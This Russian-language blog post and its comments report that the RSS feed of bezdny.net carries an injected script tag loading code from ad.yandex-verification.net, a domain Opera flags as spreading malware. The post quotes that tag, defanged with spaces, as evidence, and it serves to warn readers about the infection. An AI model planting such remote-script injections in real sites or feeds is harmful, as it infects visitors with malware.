опасность на bezdny.net и yandex-verification.net

Ещё 12 мая обнаружил, что мой Google Reader перестал получать новые цитатки с bezdny.net. Только сегодня я решил заглянуть, что там случилось. Я был подписан на Топ Безны если что. Сама же RSS лента располагается на извесном rss агригаторе feedburner.google.com, если точнее по адресу: http://feeds.feedburner.com/bezdny_net/main

Когда я перешел по ссылке, увидел, что Opera не распознала ленту и не стилизовала её, но ещё до тега <?xml version="1.0" вставлен кусок кода раз пять наверно:

<scr ipt type="text/javascript" src="http://ad.yandex-verification.net/verify-v1"></scri pt>

Когда перешел по ссылке http :// ad.yandex-verification.net/verify-v1, Opera выдала вот что:

<b>Предупреждение о вредоносном ПО</b>
 
Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.
 
Opera Software настоятельно не рекомендует посещать эту страницу.

Я сразу же обратился в support@bash.org.ru (по ошибке конечно же, т.к. сайт bezdny.net ворует цитаты) изначально описав проблему но без указания на возможность взлома, и в ответ разумеется получил:

А вы не перепутали, в какой саппорт писать?

ПыСы:
Получил очередной ответ от поддержки bash.org.ru: "Мы не пользуемся услугами фидбёрнера. Мы не предоставляем фид топа Бездны. Мы не отвечаем за сайты, ворующие наш контент." Хотя лично мне кажется, что если уже сделали рубрики типа "бездны" и "топа безны", "лучшего", то неужели тяжело для них rss прикрутить?
Лентяи короче...

Комментарии

Настройки просмотра комментариев

Выберите нужный метод показа комментариев и нажмите "Сохранить установки".

Если поискать в гугл, то такой заразы хватает

Вбил в гугл поиск по ссылке на вредонос и там таких сайтов достаточно:

Результатов: примерно 42 800 (0,35 сек.) 

Зараза распространяется!

Да, жалобы на проблемы с сайтами начались ещё 13.05.2011. Народ начал находить у себя эту вставку подключение вредоносного скрипта на форумах.

Хм, я всё таки взял ссылку на эту ленту с офсайта

По крайней мере я нашел этому подтверждение в ЖЖ: http://livejohan.livejournal.com/262881.html
Вот они эти линки на фидбёрнер..

Получил ответ от поддержки bash.org.ru

"Мы не пользуемся услугами фидбёрнера. Мы не предоставляем фид топа Бездны. Мы не отвечаем за сайты, ворующие наш контент."

Тогда буду в поддержку feedburner писать, хай валят нерадивый фид...

а с другой стороны

А вот вывод на происходящее с другой стороны: очень полезно пользоваться rss ридерами типа http://www.google.com/reader/. Вредоносный код обрабатывается на стороне сервиса, есть фильтры, и пользователь почти не рискует заразиться.

Щас только время появилось...

... и я добрался до фида, посмотрел контактные данные...Оказывается есть такой сайт bezdny.net, который ворует цитатки с баша. Так вот этот сайт и разместил на фидбёрнере свою RSS ленту. В коде сайта bezdny.net содержится код вредоноса, он же и продублирован в ленте. Я написал письмо хозяину сайта, жду ответа)))

Отправить комментарий

  • Доступны HTML теги: <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Строки и параграфы переносятся автоматически.

Подробнее о форматировании

Image CAPTCHA
Enter the characters shown in the image.
Поделиться: